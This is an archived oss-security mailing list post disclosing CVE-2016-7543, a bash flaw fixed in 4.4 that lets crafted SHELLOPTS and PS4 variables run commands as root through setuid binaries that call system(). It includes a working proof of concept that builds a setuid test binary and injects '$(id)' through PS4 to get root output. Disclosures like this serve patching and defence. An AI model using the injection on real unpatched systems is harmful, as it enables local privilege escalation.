Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Mon, 26 Sep 2016 17:43:25 +0200
From: up201407890@...nos.dcc.fc.up.pt
To: oss-security@...ts.openwall.com
Subject: CVE-2016-7543 -- bash SHELLOPTS+PS4

The recent bash 4.4 patched an old attack vector regarding
specially crafted SHELLOPTS+PS4 environment variables
against bogus setuid binaries using system()/popen().

https://lists.gnu.org/archive/html/bug-bash/2016-09/msg00018.html

"nn. Shells running as root no longer inherit PS4 from the environment,
closing a security hole involving PS4 expansion performing command
substitution."

# gcc -xc - -otest <<< 'int main() { setuid(0); system("/bin/date"); }'
# chmod 4755 ./test
# ls -l ./test
-rwsr-xr-x. 1 root root 8549 Sep 10 18:06 ./test
# exit
$ env -i SHELLOPTS=xtrace PS4='$(id)' ./test
uid=0(root)
Sat Sep 10 18:06:36 WET 2016

Sorry Tavis :P

----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.


Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ